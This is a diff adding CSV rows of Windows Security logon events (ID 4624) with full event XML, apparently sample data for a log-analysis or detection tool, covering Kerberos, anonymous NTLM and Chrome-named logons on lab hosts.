+    <TimeCreated SystemTime=""2019-03-18T23:24:20.960030Z"">
+    </TimeCreated>
+    <EventRecordID>565653</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""452"" ThreadID=""696"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>WIN-77LTAPHIQ1R.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">WIN-77LTAPHIQ1R$</Data>
+    <Data Name=""TargetDomainName"">EXAMPLE</Data>
+    <Data Name=""TargetLogonId"">0x16792b</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName""></Data>
+    <Data Name=""LogonGuid"">5FDB15EE-2283-F23C-E23B-5E5DDB11BB9C</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">55878</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+  </EventData>
+</Event>"
+1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,3,Advapi,-,MSEDGEWIN10,MSEDGEWIN10,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T18:04:39.987123Z"">
+    </TimeCreated>
+    <EventRecordID>161473</EventRecordID>
+    <Correlation ActivityID=""C5412E82-8BC5-0000-0A2F-41C5C58BD601"">
+    </Correlation>
+    <Execution ProcessID=""644"" ThreadID=""5436"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1009</Data>
+    <Data Name=""SubjectUserName"">svc01</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x10b6b3</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""TargetUserName"">IEUser</Data>
+    <Data Name=""TargetDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""TargetLogonId"">0x22afa1</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Advapi  </Data>
+    <Data Name=""AuthenticationPackageName"">MICROSOFT_AUTHENTICATION_PACKAGE_V1_0</Data>
+    <Data Name=""WorkstationName"">MSEDGEWIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x140c</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\inetsrv\w3wp.exe</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2019-05-11T21:10:10.889320+04:00,1557594610.88932,4624,IEUser,IEWIN7,9,seclogo,::1,,IEWIN7,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-11T17:10:10.889320Z"">
+    </TimeCreated>
+    <EventRecordID>18206</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""492"" ThreadID=""564"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3583694148-1414552638-2922671848-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">IEWIN7</Data>
+    <Data Name=""SubjectLogonId"">0x1371b</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-3583694148-1414552638-2922671848-1000</Data>
+    <Data Name=""TargetUserName"">IEUser</Data>
+    <Data Name=""TargetDomainName"">IEWIN7</Data>
+    <Data Name=""TargetLogonId"">0x1bbdce</Data>
+    <Data Name=""LogonType"">9</Data>
+    <Data Name=""LogonProcessName"">seclogo</Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName""></Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x3c8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">0</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:32:10.232423+04:00,1600198330.232423,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:31:34.954809Z"">
+    </TimeCreated>
+    <EventRecordID>768628</EventRecordID>
+    <Correlation ActivityID=""CF4015C6-8B8F-0000-C816-40CF8F8BD601"">
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""2688"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x32a0d3</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">6747BCF0-DBAA-F21C-878B-EB339B03FA80</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">50441</Data>
+    <Data Name=""ImpersonationLevel"">%%1840</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:31:34.957514+04:00,1600198294.957514,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:31:32.206739Z"">
+    </TimeCreated>
+    <EventRecordID>768627</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""1820"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x329baa</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">1EC715BD-2DAC-8C05-8940-40F79E2D2D52</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">50443</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:31:31.097681+04:00,1600198291.097681,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:30:32.190369Z"">
+    </TimeCreated>
+    <EventRecordID>768622</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""1820"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x320935</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">1EC715BD-2DAC-8C05-8940-40F79E2D2D52</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">50438</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:31:04.688967+04:00,1600198264.688967,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:29:51.517594Z"">
+    </TimeCreated>
+    <EventRecordID>768621</EventRecordID>
+    <Correlation ActivityID=""CF4015C6-8B8F-0000-C816-40CF8F8BD601"">
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""2688"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-7</Data>
+    <Data Name=""TargetUserName"">ANONYMOUS LOGON</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x31ff89</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">02694W-WIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V1</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.37</Data>
+    <Data Name=""IpPort"">49707</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1843</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:30:32.190369+04:00,1600198232.190369,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:29:51.507713Z"">
+    </TimeCreated>
+    <EventRecordID>768620</EventRecordID>
+    <Correlation ActivityID=""CF4015C6-8B8F-0000-C816-40CF8F8BD601"">
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""640"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-7</Data>
+    <Data Name=""TargetUserName"">ANONYMOUS LOGON</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x31ff6e</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">02694W-WIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V1</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.37</Data>
+    <Data Name=""IpPort"">49707</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1843</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:29:51.517594+04:00,1600198191.517594,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:29:32.174941Z"">
+    </TimeCreated>
+    <EventRecordID>768619</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""1820"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x31fb1a</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">1EC715BD-2DAC-8C05-8940-40F79E2D2D52</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">50437</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-15T23:29:51.507713+04:00,1600198191.507713,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-15T19:28:32.159991Z"">
+    </TimeCreated>
+    <EventRecordID>768618</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""1636"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x31daf6</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">1EC715BD-2DAC-8C05-8940-40F79E2D2D52</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">50436</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-09T13:18:27.714758Z"">
+    </TimeCreated>
+    <EventRecordID>137225</EventRecordID>
+    <Correlation ActivityID=""74A48CA1-86F6-0001-2E8D-A474F686D601"">
+    </Correlation>
+    <Execution ProcessID=""640"" ThreadID=""684"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x79e59</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""TargetUserName"">IEUser</Data>
+    <Data Name=""TargetDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""TargetLogonId"">0x1cd964</Data>
+    <Data Name=""LogonType"">2</Data>
+    <Data Name=""LogonProcessName"">Chrome</Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName"">MSEDGEWIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x1358</Data>
+    <Data Name=""ProcessName"">C:\Program Files (x86)\Google\Chrome\Application\chrome.exe</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x1cd8f6</Data>
+    <Data Name=""ElevatedToken"">%%1843</Data>
+  </EventData>
+</Event>"
+2020-09-09T17:18:27.714758+04:00,1599657507.714758,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-09T13:18:27.714613Z"">
+    </TimeCreated>
+    <EventRecordID>137224</EventRecordID>
+    <Correlation ActivityID=""74A48CA1-86F6-0001-2E8D-A474F686D601"">
+    </Correlation>
+    <Execution ProcessID=""640"" ThreadID=""684"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x79e59</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""TargetUserName"">IEUser</Data>
+    <Data Name=""TargetDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""TargetLogonId"">0x1cd8f6</Data>
+    <Data Name=""LogonType"">2</Data>
+    <Data Name=""LogonProcessName"">Chrome</Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName"">MSEDGEWIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x1358</Data>
+    <Data Name=""ProcessName"">C:\Program Files (x86)\Google\Chrome\Application\chrome.exe</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x1cd964</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
